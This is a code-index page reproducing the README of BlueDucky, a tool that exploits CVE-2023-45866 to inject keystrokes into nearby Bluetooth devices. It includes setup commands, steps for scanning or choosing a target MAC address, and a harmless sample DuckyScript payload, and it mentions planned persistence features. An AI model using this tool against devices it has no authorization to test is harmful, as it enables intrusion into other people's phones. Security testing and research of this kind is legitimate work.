MCPcopy
hub / github.com/pentestfunctions/BlueDucky

github.com/pentestfunctions/BlueDucky @main sqlite

repository ↗ · DeepWiki ↗
68 symbols 171 edges 5 files 0 documented · 0%
README

BlueDucky Ver 2.1 (Android) 🦆

Thanks to all the people at HackNexus. Make sure you come join us on VC ! https://discord.gg/HackNexus

NOTES: I will not be able to run this on a laptop or other device outside of a raspberry pi for testing. Due to this, any issues you have will need to be resolved among each other as I do not have the spare funds to buy an adapter.

  1. saad0x1's GitHub
  2. spicydll's GitHub
  3. lamentomori's GitHub

🚨 CVE-2023-45866 - BlueDucky Implementation (Using DuckyScript)

🔓 Unauthenticated Peering Leading to Code Execution (Using HID Keyboard)

This is an implementation of the CVE discovered by marcnewlin

Introduction 📢

BlueDucky is a powerful tool for exploiting a vulnerability in Bluetooth devices. By running this script, you can:

  1. 📡 Load saved Bluetooth devices that are no longer visible but have Bluetooth still enabled.
  2. 📂 Automatically save any devices you scan.
  3. 💌 Send messages via ducky script format to interact with devices.

I've successfully run this on a Raspberry Pi 4 using the default Bluetooth module. It works against various phones, with an interesting exception for a New Zealand brand, Vodafone.

Installation and Usage 🛠️

Setup Instructions for Debian-based

# update apt
sudo apt-get update
sudo apt-get -y upgrade

# install dependencies from apt
sudo apt install -y bluez-tools bluez-hcidump libbluetooth-dev \
                    git gcc python3-pip python3-setuptools \
                    python3-pydbus

# install pybluez from source
git clone https://github.com/pybluez/pybluez.git
cd pybluez
sudo python3 setup.py install

# build bdaddr from the bluez source
cd ~/
git clone --depth=1 https://github.com/bluez/bluez.git
gcc -o bdaddr ~/bluez/tools/bdaddr.c ~/bluez/src/oui.c -I ~/bluez -lbluetooth
sudo cp bdaddr /usr/local/bin/

Setup Instructions for Arch-based

# update pacman & packages
sudo pacman -Syyu

# install dependencies
# since arch doesn't separate lib packages: libbluetooth-dev included in bluez package
sudo pacman -S bluez-tools bluez-utils bluez-deprecated-tools \
               python-setuptools python-pydbus python-dbus
               git gcc python-pip \

# install pybluez from source
git clone https://github.com/pybluez/pybluez.git
cd pybluez
sudo python3 setup.py install

# build bdaddr from the bluez source
cd ~/
git clone --depth=1 https://github.com/bluez/bluez.git
gcc -o bdaddr ~/bluez/tools/bdaddr.c ~/bluez/src/oui.c -I ~/bluez -lbluetooth
sudo cp bdaddr /usr/local/bin/

Running BlueDucky

git clone https://github.com/pentestfunctions/BlueDucky.git
cd BlueDucky
sudo hciconfig hci0 up
python3 BlueDucky.py

alternatively,

pip3 install -r requirements.txt

Operational Steps 🕹️

  1. On running, it prompts for the target MAC address.
  2. Pressing nothing triggers an automatic scan for devices.
  3. Devices previously found are stored in known_devices.txt.
  4. If known_devices.txt exists, it checks this file before scanning.
  5. Executes using payload.txt file.
  6. Successful execution will result in automatic connection and script running.

Duckyscript 💻

🚧 Work in Progress: - Suggest me ideas

Version 2.1 🐛

  • Updated UI
  • Improved User Experience
  • Bluetooth Debugger; Checks your bluetooth adapters, and installed dependancies before allowing access to the application, this is to prevent devices that are not supported.
  • Please Note: Numerous Changes have been made,please reference the commit history for specific changes.

What's Planned for the Next Release?

  • Integrated DuckyScript Console for attacks that want to maintain persistance, after a payload has been ran
  • Suggest What Should be added next! Join https://discord.gg/HackNexus

📝 Example payload.txt:

REM Title of the payload
STRING ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890!@#$%^&*()_-=+\|[{]};:'",<.>/?
GUI D
REM Opens a private browser to hackertyper.net
DELAY 200
ESCAPE
GUI d
ALT ESCAPE
GUI b
DELAY 700
REM PRIVATE_BROWSER is equal to CTRL + SHIFT + N
PRIVATE_BROWSER
DELAY 700
CTRL l
DELAY 300
STRING hackertyper.net
DELAY 300
ENTER
DELAY 300

Enjoy experimenting with BlueDucky! 🌟

Core symbols most depended-on inside this repo

send_keypress
called by 18
BlueDucky.py
send
called by 12
BlueDucky.py
encode_keyboard_input
called by 6
BlueDucky.py
run
called by 4
utils/menu_functions.py
power
called by 3
BlueDucky.py
create_connection
called by 3
BlueDucky.py
send_keyboard_combination
called by 3
BlueDucky.py
set_property
called by 2
BlueDucky.py

Shape

Method 29
Function 26
Class 13

Languages

Python100%

Modules by API surface

BlueDucky.py48 symbols
utils/menu_functions.py13 symbols
utils/register_device.py6 symbols
utils/magic_keyboard_hid.py1 symbols

Dependencies from manifests, versioned

PyBluez0.30 · 1×
PyGObject3.48.1 · 1×
dbus-python1.3.2 · 1×
pycairo1.26.0 · 1×
pydbus0.6.0 · 1×
setuptools57.5.0 · 1×

For agents

$ claude mcp add BlueDucky \
  -- python -m otcore.mcp_server <graph>

⬇ download graph artifact